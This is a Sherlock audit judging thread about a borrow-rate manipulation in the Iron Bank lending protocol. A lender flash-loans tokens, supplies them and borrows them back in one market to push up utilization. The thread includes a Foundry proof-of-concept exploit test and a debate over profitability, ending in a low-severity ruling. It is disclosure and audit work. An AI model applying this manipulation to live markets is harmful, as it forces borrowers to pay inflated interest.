### ISSUE TITLE
smiling_heretic - `borrowRate` can be manipulated in a way that's risk-free and profitable to a malicious lender

### ISSUE THREAD

**Issue by sherlock-admin** [sherlock-audit/2023-05-ironbank-judging#256]
smiling_heretic

medium

# `borrowRate` can be manipulated in a way that's risk-free and profitable to a malicious lender

## Summary

Malicious lender can `supply` and then `borrow` back a huge amount of tokens from a single market.

The net effect of this action is increased `utilization` (and what follows increased `borrowRate`) for the market.

This action is free of risk of liquidation. It's because the asset is backed by the same asset so `collateralValue / debtValue` doesn't change with fluctuating `assetPrice` and decreases very slowly and predictably with interest accrual.

This action is often (depending on the initial state of the pool) guaranteed to be profitable for the malicious lender (profit from increased  `borrowRate` predictably outweighs loss from slow decrease of `getSupplyBalance(attacker, market) / getBorrowBalance(attacker, market)` with interest accrual).  

## Vulnerability Detail

For sake of simplicity, let's assume for now that:
1. the attacker (malicious lender) is the only user that has supplied to the pool (let's say their`supplyBalance == 1000 tokens`)
2.  an honest borrower borrowed half of this supply (`borrowBalance == 500` tokens) 
3. `reserveFactor == 0` for this market

(`supplyBalance` and `supplyBalance` mean values returned by functions `ib.getSupplyBalance` and `ib.getBorrowBalance`)

More realistic initial conditions of the attacked market will be discussed in the Proof of Concept section.

### Observation 1:
Nothing prevents the attacker from taking a large flash loan of `attackAmount` market tokens, then calling `ironBank.supply` with the borrowed tokens, then calling `ironBank.borrow` to get all these tokens back and then repaying the flash loan. If `collateralFactor == 90%` then the attacker can do this with up to `9000` flash loaned tokens (to pass liquidity check).

### Observation 2:
This operation doesn't change `totalCash` of the market but it increases `totalSupply` and `totalBorrow` proportionally to `attackAmount`.

### Observation 3:
The formula for `exchangeRate` (it's the exchange rate between supply / Iron Bank tokens and underlying tokens) is [as follows](https://github.com/sherlock-audit/2023-05-ironbank/blob/9ebf1702b2163b55479624794ab7999392367d2a/ib-v2/src/protocol/pool/IronBank.sol#L810):

``` ((m.totalCash + m.totalBorrow) * 1e18) / totalSupplyPlusReserves;```

After the attack, `totalCash / totalBorrow` will become small (because `totalCash` stayed constant and `totalBorrow` was artificially increased by a lot).

When interest accrues, then `borrowIndex` and `totalBorrow` for the market and `borrowBalance` for each user, increase proportionally. Because `totalCash` is now small, `exchangeRate` is basically proportional to `totalBorrow`. It follows that `(part of supplyBalance from attack) / borrowBalance` will stay (nearly) constant and equal to `1` on interest accrual (numerator and denominator will increase proportionally).

In other words, additional interest from the supplied `attackAmount` tokens will (nearly) cancel out debt accrued from borrowing `attackAmount` tokens. This makes the "cost" of the attack very small and under control.

### Observation 4:

Let's look at the formulas for `collateralValue` and `debtValue` in [`_getAccountLiquidity`](https://github.com/sherlock-audit/2023-05-ironbank/blob/9ebf1702b2163b55479624794ab7999392367d2a/ib-v2/src/protocol/pool/IronBank.sol#L1051-L1054)

As we can see, attacker's `collateralValue / debtValue` stays (nearly) constant and risk of liquidation is avoided because `supplyBalance` increases proportionally to `borrowBalance` on interest accrual as established in observation 3. 

It definitely doesn't change with `assetPrice` because it gets canceled out during division.

### Observation 5

Also, notice that `supplyBalance - borrowBalance > 0` because of the initial supply of `1000` tokens and it grows (nearly) proportionally to `borrowIndex` (interest accrual). This is how attacker gains money from the attack.

### Observation 6

The formula for utilization is [as follows](https://github.com/sherlock-audit/2023-05-ironbank/blob/9ebf1702b2163b55479624794ab7999392367d2a/ib-v2/src/protocol/pool/interest-rate-model/TripleSlopeRateModel.sol#L41):

``` utilization = (totalBorrow * 1e18) / (totalCash + totalBorrow); ```

Again, after the attack, `totalCash` stays constant but `totalBorrow` increases by a lot. So utilization increases and, in fact, can be made very close to `1e18`.

`borrowRate` is a function of `utilization` and increases when `utilization` increases.

So after the attack, malicious lender will be earning much higher interest on their initial supply of `1000` tokens.

## Proof of Concept
`ib-v2/test/TestExploit.t.sol`

```solidity
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.0;

import "forge-std/Test.sol";
import "./Common.t.sol";

contract ExploitTest is Test, Common {
    uint8 internal constant underlyingDecimals1 = 18; // 1e18
    uint8 internal constant underlyingDecimals2 = 6; // 1e6
    uint16 internal constant reserveFactor = 200; // 2%

    int256 internal constant market1Price = 1500e8;
    int256 internal constant market2Price = 200e8;
    uint16 internal constant market1CollateralFactor = 9000; // 90%
    uint16 internal constant market2CollateralFactor = 9000; // 90%

    uint256 internal constant baseRatePerSecond = 0.000000001e18;
    uint256 internal constant borrowPerSecond1 = 0.00000002e18;
    uint256 internal constant kink1 = 0.8e18;
    uint256 internal constant borrowPerSecond2 = 0.00000004e18;
    uint256 internal constant kink2 = 0.9e18;
    uint256 internal constant borrowPerSecond3 = 0.00000012e18;

    IronBank ib;
    MarketConfigurator configurator;
    CreditLimitManager creditLimitManager;
    FeedRegistry registry;
    PriceOracle oracle;
    TripleSlopeRateModel irm;

    ERC20Market market1;
    ERC20Market market2;
    IBToken ibToken1;
    IBToken ibToken2;

    address admin = address(64);
    address honestBorrower = address(128);
    address attacker = address(666);

    // ATTACK PARAMETERS
    uint256 honestBorrowerSupplyAmount = 10_000 * (10 ** underlyingDecimals2); // collateral in market 2
    uint256 otherLendersSupplyAmount = 200 * (10 ** underlyingDecimals1);

    uint256 honestBorrowAmount = 1000 * (10 ** underlyingDecimals1);
    uint256 attackerInitialSupplyAmount = 2000 * (10 ** underlyingDecimals1);

    uint256 attackAmount = 8 * attackerInitialSupplyAmount;
    uint256 attackerFlashLoanAmount2 = 10 * attackAmount;

    uint256 numDays = 14; // how long to accrue the interest

    function setUp() public {
        ib = createIronBank(admin);

        configurator = createMarketConfigurator(admin, ib);

        vm.prank(admin);
        ib.setMarketConfigurator(address(configurator));

        creditLimitManager = createCreditLimitManager(admin, ib);

        vm.prank(admin);
        ib.setCreditLimitManager(address(creditLimitManager));

        irm = createIRM(
            baseRatePerSecond,
            borrowPerSecond1,
            kink1,
            borrowPerSecond2,
            kink2,
            borrowPerSecond3
        );

        (market1, ibToken1, ) = createAndListERC20Market(
            underlyingDecimals1,
            admin,
            ib,
            configurator,
            irm,
            reserveFactor
        );
        (market2, ibToken2, ) = createAndListERC20Market(
            underlyingDecimals2,
            admin,
            ib,
            configurator,
            irm,
            reserveFactor
        );

        registry = createRegistry();
        oracle = createPriceOracle(admin, address(registry));

        vm.prank(admin);
        ib.setPriceOracle(address(oracle));

        setPriceForMarket(
            oracle,
            registry,
            admin,
            address(market1),
            address(market1),
            Denominations.USD,
            market1Price
        );
        setPriceForMarket(
            oracle,
            registry,
            admin,
            address(market2),
            address(market2),
            Denominations.USD,
            market2Price
        );

        configureMarketAsCollateral(
            admin,
            configurator,
            address(market1),
            market1CollateralFactor
        );
        configureMarketAsCollateral(
            admin,
            configurator,
            address(market2),
            market2CollateralFactor
        );

        deal(address(market1), admin, otherLendersSupplyAmount);
        deal(address(market1), honestBorrower, 2 * honestBorrowAmount);
        deal(address(market2), honestBorrower, honestBorrowerSupplyAmount);
        deal(address(market1), attacker, attackerInitialSupplyAmount);
    }

    function _setUpInitialSupplyAndBorrow() internal {
        // other lenders supply otherLendersSupplyAmount to the market
        vm.startPrank(admin);
        market1.approve(address(ib), otherLendersSupplyAmount);
        ib.supply(admin, admin, address(market1), otherLendersSupplyAmount);
        vm.stopPrank();

        // attacker supplies attackerInitialSupplyAmount to the market
        // this is the money they will get more yield from thanks to the attack
        vm.startPrank(attacker);
        market1.approve(address(ib), type(uint256).max);
        ib.supply(
            attacker,
            attacker,
            address(market1),
            attackerInitialSupplyAmount
        );
        vm.stopPrank();

        // honest borrower supplies collateral to some other market
        // and then borrows honestBorrowAmount from the attacked market
        vm.startPrank(honestBorrower);
        market2.approve(address(ib), honestBorrowerSupplyAmount);
        ib.supply(
            honestBorrower,
            honestBorrower,
            address(market2),
            honestBorrowerSupplyAmount
        );
        ib.borrow(
            honestBorrower,
            honestBorrower,
            address(market1),
            honestBorrowAmount
        );
        vm.stopPrank();
    }

    function _redeemAndRepayAferTheAttack() internal {
        // wait for the interest to accure
        for (uint i; i < numDays; i++) {
            fastForwardTime(86400);
            ib.accrueInterest(address(market1));
        }
        assertEq(ib.isUserLiquidatable(attacker), false);

        // honest borrower repays their debt (or gets liquidated)
        vm.startPrank(honestBorrower);
        market1.approve(address(ib), type(uint256).max);
        ib.repay(
            honestBorrower,
            honestBorrower,
            address(market1),
            type(uint256).max
        );
        vm.stopPrank();

        // attacker claims their profit from the attack (or just normal yield)
        // flash loan not really needed in the normal scenario here
        vm.startPrank(attacker);
        // take the flash loan
        deal(address(market1), attacker, attackerFlashLoanAmount2);
        // repay the (artificial) debt
        ib.repay(attacker, attacker, address(market1), type(uint256).max);
        // redeem the IronBank (supply) tokens for underlying asset
        ib.redeem(attacker, attacker, address(market1), type(uint256).max);
        // repay flash loan
        market1.transfer(address(1), attackerFlashLoanAmount2);
        vm.stopPrank();
    }

    function _manipulateUtilization() internal {
        vm.startPrank(attacker);
        // take flash loan
        deal(address(market1), attacker, attackAmount);
        // do the supply borrow for the same market
        ib.supply(attacker, attacker, address(market1), attackAmount);
        ib.borrow(attacker, attacker, address(market1), attackAmount);
        // repay flash loan
        market1.transfer(address(1), attackAmount);
        vm.stopPrank();
    }

    function testNormalScenario() public {
        assertEq(market1.balanceOf(attacker) / 1e18, 2000);
        _setUpInitialSupplyAndBorrow();

        // attacker does nothing

        // check utilization and borrowRate without attack
        uint256 totalCash = ib.getTotalCash(address(market1));
        uint256 totalBorrow = ib.getTotalBorrow(address(market1));
        assertEq(irm.getUtilization(totalCash, totalBorrow) / 1e16, 45);
        assertEq(irm.getBorrowRate(totalCash, totalBorrow), 10090909090);

        _redeemAndRepayAferTheAttack();
        assertEq(market1.balanceOf(attacker) / 1e18, 2010);
    }

    function testExploit() public {
        assertEq(market1.balanceOf(attacker) / 1e18, 2000);
        _setUpInitialSupplyAndBorrow();

        // attacker manipulates utilization and borrow rate
        _manipulateUtilization();

        // check utilization and borrowRate after the attack
        uint256 totalCash = ib.getTotalCash(address(market1));
        uint256 totalBorrow = ib.getTotalBorrow(address(market1));
        assertEq(irm.getUtilization(totalCash, totalBorrow) / 1e16, 93);
        assertEq(irm.getBorrowRate(totalCash, totalBorrow), 25087912087);

        _redeemAndRepayAferTheAttack();
        assertEq(market1.balanceOf(attacker) / 1e18, 2014);
    }
}
```

One can derive the general (with other lenders present, non-zero `reserveFactor`, non-zero `totalCash` after the attack) formula for the profit to the attacker. This formula is:

`profit = supplyBalance - borrowBalance - attackerInitialSupplyAmount`
`profit = (borrowIndexFinal / borrowIndexInitial - 1) * honestBorrowAmount - (exchangeRateFinal / exchangeRateInitial - 1) * otherLendersSupplyAmount  -  exchangeRateFinal * reservesFinal / 1e18`

As we can see, if `reserveFactor == 0` and the attacker is the only lender, then the profit for the attacker clearly increases with `attackAmount` (because `borrowIndexFinal / borrowIndexInitial` increases with `attackAmount`).

For non-zero `reserveFactor` and other lenders present, the formula becomes a bit more difficult to reason about but it's still easy to empirically find values for which the profit is larger than in the normal  (`attackAmount == 0`) scenario.

Even if the attack happens to be unprofitable (compared to the normal scenario) for an individual attacker for a certain pool, lenders can still collude and share costs of increasing `borrowRate` because they all benefit from it.

## Impact

The impact is more or less equivalent to adding a premissionless function `increaseBorrowRate(market, borrowAmount)` to the protocol.

Initial borrowers will have to pay unreasonably high interest rates on their loans until they figure out that something is wrong and stop using the protocol or until they got liquidated. It benefits malicious lenders and causes material loss of funds to borrowers.

More importantly, availability of this attack breaks incentives of the protocol. The protocol will suffer from artificially high `borrowRate`s and `utilization`s close to 100%. The `borrowRate`s will be much higher than it would follow from market demand for borrowing particular assets and will cause borrowers to avoid the protocol.

The dynamic here will be probably as follows: some initial borrowers will get exploited by malicious lenders (if you can increase your APY for free, why wouldn't you?) and then borrowers will start avoiding the protocol.

## Code Snippet

https://github.com/sherlock-audit/2023-05-ironbank/blob/9ebf1702b2163b55479624794ab7999392367d2a/ib-v2/src/protocol/pool/interest-rate-model/TripleSlopeRateModel.sol#L41

## Tool used

Foundry, Wolfram Alpha

## Recommendation

Don't allow users to have both non-zero `userSupplies` and non-zero `userBorrows` in the same market.

**Comment by SmilingHeretic** [comment]
Escalate for 10 USDC

Not sure why this issue is excluded because no reason was given.

I still think this issue is valid and medium risk.

Issue shows clearly with coded PoC how a malicious lender can cause material loss of funds to borrowers (and benefit from it) which meets Sherlock's criteria for medium severity.


Not sure if it helps, but here’s another way to think about how this attack could happen:

1. An attacker creates a smart contract that is a pool with yield farming strategy that does the following:

    a. It accepts deposits and withdrawals from users.

    b. If performing the attack (flash loan, supply, borrow from a single Iron Bank pool) happens to **not** increase APY, then it simply supplies users’ funds to Iron Bank

    c. If performing the attack is profitable, then it supplies users’ funds to Iron Bank **and** executes the attack.

2. This pool is guaranteed to give APY equal or greater than this of vanilla Iron Bank protocol.

3. Because of larger APY, “rational“ lenders that care only about increasing their APY switch over to the attacker’s yield farming “protocol“ (instead of still supplying directly to Iron Bank)

4. Now the attacker’s pool has more tokens to supply and `otherLendersSupplyAmount` is smaller and `attackerInitialSupplyAmount` is larger which helps with meeting the condition for the profitability of the attack.

5. Attacker can charge a fee for using their “protocol” in a way that using it is still more profitable to lenders than using vanilla Iron Bank.

**Comment by 0xffff11** [comment]
Thanks for the PoC and the nice report. It worked on my side, I definitely can see the issue as a medium

**Comment by hrishibhat** [comment]
@SmilingHeretic 
This issue can be considered a low. Agree with the Lead Watson comment below. 

> The only way for the attacker to make money would be for the reserve factor to be zero (which it isn't intended to be) and there is not a single other lender in the entire market which I find extremely unlikely. Protocol could completely disarm the entire attack and cause massive loss to the attacker by setting reserve factor to anything other than 0. Low IMO

**Comment by SmilingHeretic** [comment]
@hrishibhat 
The PoC is with `reserveFacor = 2%` and it is still possible to profit with `reserveFactor = 10%`.

There doesn't have to be only one lender in the pool.

The assumptions of only one lender in the pool and `reserveFactor = 0` in Vulnerability Detail are only for simplicity because in this case it's easier to explain what exactly is happening. The attack is still often profitable when these simplifying assumptions are false. 

Please, notice that the PoC is with `reserveFactor = 2%` and other lenders present.

**Comment by IAm0x52** [comment]
Took a deeper look at this. To make the math for profitability simpler let's think about this problem in terms of decimals fractions. We can break down how much additional interest the attacker receives with respect to the amount of legitimate supply fraction. As the real supply fraction and the reserve factor increases, the amount paid to the attacker decreases and can be modeled as below:

Gain = (1 - realSupplyFrac) * (1 - reserveFactor) 

Now how much the attacker will pay is directly dependent on what faction of borrows are real. The more legitimate borrowing, the less the attacker has to pay since they have to borrow less to hit the cap. This can be modeled as below:

Loss = (1 - realBorrowFrac) 

With gain and loss now defined we can calculate the limit to of profitability where they are equal:

Loss = Gain

(1 - realBorrowFrac) = (1 - realSupplyFrac) * (1 - reserveFactor) 

realBorrowFrac = realSupplyFrac + reserveFactor (1 - realSupplyFrac)

This gives us the theoretical limit of profitability. Assuming a typical reserve factor of 10% the attacker can achieve profitability when above the line shown below. 

![image](https://github.com/sherlock-audit/2023-05-ironbank-judging/assets/109287400/56f9d649-03b1-4504-b40a-547711eeb0b8)

This leads to the important conclusion that healthy and legitimate markets can never be exploited via repeatedly looped borrows and supplies. The only attack vector that is left would be to supply a huge percentage of the entire supply cap then wait for the legitimate borrowers to increase the real supply fraction to a point where it would be profitable to attack.

The other important conclusion we can draw is that when reserve factor is non-zero, there is always a non-zero value to which the legitimate borrowers can reduce their borrows to keep this attack from being profitable. Borrows can be repaid at any moment. Iron bank doesn't exist in isolation and therefore borrowers can and will move their borrows to another platform such as AAVE or Compound. This means that the attacker could only ever manipulate the borrow APR to the average market yield (maybe slightly higher) or else borrowers would leave the Ironbank for other platforms. Since that inflated APR is paid for mostly by the attacker they would simply be better off supplying to another market rather than trying to manipulate Ironbank. Additionally since this equilibrium exists it also guarantees that all the legitimate supply (plus some of the attackers supply) can be borrowed without risk of this occurring. 
 
Assuming rational borrowers this attack doesn't make economic sense to the attacker since they would always just be better off supplying their capital to another legitimate market rather than trying to attack Ironbank. This brings us to the worst case scenario of this attack which would be a DOS of the market with no gain (and loss of interest they would get elsewhere) to themselves. 

Every defi lending platform has this theoretical "problem" because it's inherent to the design of decentralized lending. In reality though it can't actually be exploited because there are always competitive markets that rational borrowers can and will move to.

**Comment by SmilingHeretic** [comment]
Thanks for taking a deeper look at my submission! Here is my reply:

> The only attack vector that is left would be to supply a huge percentage of the entire supply cap then wait for the legitimate borrowers to increase the real supply fraction to a point where it would be profitable to attack.

Ok, so attacker would initially supply huge amount. This would decrease `borrowRate` making Iron Bank more attractive than other platforms to borrowers. After enough borrowers join,`borrowRate` returns close to it’s initial (market equilibrium) value. Now attacker executes flashloan, supply, borrow.

There’s also another way to do it without relying on reaching the supply cap (to prevent other lenders from joining and decreasing `borrowRate`), as described in the escalation.

> Borrows can be repaid at any moment.

Let's remember that it works also for the attacker: they can exit their "attack position"  as soon as it stops being more profitable to them than the alternatives.

>  This means that the attacker could only ever manipulate the borrow APR to the average market yield (maybe slightly higher) or else borrowers would leave the Ironbank for other platforms.

What would happen, if the attacker increases APR well above average market yield?

I would imagine that some users will leave with a delay (especially if they monitor their positions more manually) and still have to pay huge interest rate for this delay time.

Also for accounts that are close to the liquidation threshold, it might be enough to push them over the edge.

This leads us to another strategy for the attacker to profit from increased `borrowRate`: liquidate accounts that won’t leave the market in time.

I think it might be perceived by the attacker as probabilistically more profitable than simply supplying to other markets.

There are probably some other creative ways of exploiting ability to increase `borrowRate` risk-free that I didn’t think of.

> Since that inflated APR is paid for mostly by the attacker they would simply be better off supplying to another market rather than trying to manipulate Ironbank.

If I understand correctly, this is because spreading your supply across different markets would initially decrease `borrowRate` in each market less than supplying everything to one market?

We can imagine that the attacker did spread their (large) supply across markets and still has enough supply in at least one market to profit from the flashloan, supply, borrow.

> Every defi lending platform has this theoretical "problem" because it's inherent to the design of decentralized lending. 

Do they?

Well, Iron Bank doesn’t have to have this problem, if we apply the recommended mitigation.

Why would allowing users to have borrow and supply in the same market at the same time make sense?

If user has some tokens to transfer to the Iron Bank market and has some `userBorrows` there, why would it be supply, not repayment?

Conversely, if user has `userSupplies` and withdraws some tokens, why would it be borrow, not redeem?


### Conclusion

It’s not so obvious if lower APR after initial supply to only Iron Bank (and not to other markets) would cause more (opportunity) cost to the attacker than profit from borrowers leaving market with delay and some of them getting liquidated.

If attacker decides that the attack is (at very least probabilistically) profitable, it will harm users (who are forced to leave the market and maybe pay fees because of that or who will leave with a delay) and definitely harm the Iron Bank protocol (it will lose users).

I think that mitigation makes sense and it’s relatively easy. I see no point in allowing malicious lenders to increase `borrowRate` like this.

**Comment by ib-tycho** [comment]
There is a term called "folding" in the lending protocol, which is essentially what was demonstrated in the Proof of Concept (PoC). However, the root cause of the issue is not solely due to allowing users to supply and borrow in the same market. It is still possible to manipulate the borrow rate using two accounts, where one supplies asset A and borrows asset B, and the other supplies asset B and borrows asset A. The argument can only be made that allowing supply and borrow in the same market makes the attack easier.

The root cause lies in the dominance of a single supplier in the market, similar to an attacker holding a significant portion of LP in an AMM pool. However, blaming the AMM protocol for enabling price manipulation is not justified.

Regarding the concept of "market equilibrium" that was mentioned, it is important to consider the potential exploitation of such attacks by other arbitrage bots. They could simply exploit the manipulated high supply APR and quickly exit using MEV bots. Since other lending protocols offer lower borrow rates, it becomes an obvious choice to borrow from elsewhere and supply into Iron Bank.

It is essential to evaluate the overall dynamics and potential risks associated with these factors.

**Comment by SmilingHeretic** [comment]
>  It is still possible to manipulate the borrow rate using two accounts, where one supplies asset A and borrows asset B, and the other supplies asset B and borrows asset A. 

What if price of asset A changes relative to price of asset B? If I understand correctly, doing it with 2 assets is much riskier because attacker can get liquidated when the price changes.

**Comment by ib-tycho** [comment]
How about two stables? USDC and DAI. The point is, you agree to my statement right?

**Comment by SmilingHeretic** [comment]
It's less risky with stables than with arbitrary assets but they can still depeg as we've seen.

I'd say that the core reason why you can do the attack risk-free is that you can supply and borrow from a single market.

Also this enables the attack for markets for which there is no other market that is stable relative to them

**Comment by ib-tycho** [comment]
Now, let's move on to the second part. Would you still consider it risk-free if there is an arbitrage bot attempting to profit from the trap intentionally set for an ordinary user?

**Comment by SmilingHeretic** [comment]
Let's see if I understand this correctly.

1. There's a market that has normal borrow rate.
2. Malicious lender supplies huge amount to attract borrowers.
3. Instead of normal users, arbitrage bots join the market and borrow (this is an assumption, it's not guaranteed).
4. Now conditions for profitability of flashloan, supply, borrow are met.
5. Malicious lender executes the attack.
6. Arbitrage bots react quickly and exit the market because of high borrow rate.
7. Malicious lender reacts quickly to decreasing borrows and exits their "attack position".

What I see here is that in this case the lender fails to profit from the attack (there's not enough delay in leaving the market by the bots) and there's some opportunity cost because the attacker could supply to many markets instead.

Risk-free part mans here that the attacker will profit with the attack at least as much as if they only normally supply to this single market.


Let's say that the state of enough borrow compared to supply of other lenders is achieved as described in the escalation (lenders supply to attacking pool instead of to Iron Bank directly). I'd imagine that in this case, attacker supply would increase more gradually and there wouldn't be really that much time when borrow rate is significantly lower than the market average.

So there are also ways to mitigate the "opportunity cost" risks.

Also more gradual increase in supply would probably attract more normal borrowers than bots.


Well, I'd say that it's better to prevent manipulation of `borrowRate` from happening in the first place than hoping that arbitrage bots will save the protocol.

EDIT: Actually, wouldn’t arbitrage bots join the attacking pool from escalation after the attack and therefore increase its dominance in the Iron Bank market?

**Comment by SmilingHeretic** [comment]
I think that there also might be arbitrage bots on the supply side of Iron Bank market. Once the attack is performed and `borrowRate`  is higher, they might leave Iron Bank and join it through the attacking pool.

So both `honestBorrowAmount`  would decrease but `attackerInitialSupplyAmount / otherLendersSupplyAmount` would increase after the attack. So it’s not really clear what would be the result.

**Comment by ib-tycho** [comment]
The arbitrage bot I mentioned previously is not what you described.

After execute the attack, arbitrage bot jumps in and supply which will make the attack not profitable since malicious lender is not the only supplier and maybe not the biggest supplier.

**Comment by ib-tycho** [comment]
The attacker is basically pumping up the borrow rate and giving out money to other lenders

**Comment by ib-tycho** [comment]
Folding is not profitable, the attack you describe is basically a whale bullying normal borrowers

**Comment by SmilingHeretic** [comment]
> After execute the attack, arbitrage bot jumps in and supply which will make the attack not profitable since malicious lender is not the only supplier and maybe not the biggest supplier.

Can be prevented by reaching supply cap or making the attacking pool from escalation more profitable than supplying directly to the Iron Bank (so arbitrage bots supply to the attacking pool, not to the Iron Bank directly).

Ok, I see now that exploiting this is more complex than I initially thought.

I still think it’s probably possible and it’s worth preventing this attack vector.

Thanks for the discussion, I've learned something from it!

I'll leave assessing the severity to the judge.

**Comment by hrishibhat** [comment]
Result:
Low
Unique
Given the complexity and the non-profitability considering this a valid low. 
Appreciate everyone for the extensive discussion on the issue.

**Comment by sherlock-admin2** [comment]
Escalations have been resolved successfully!

Escalation status:
- [SmilingHeretic](https://github.com/sherlock-audit/2023-05-ironbank-judging/issues/256/#issuecomment-1606258202): rejected
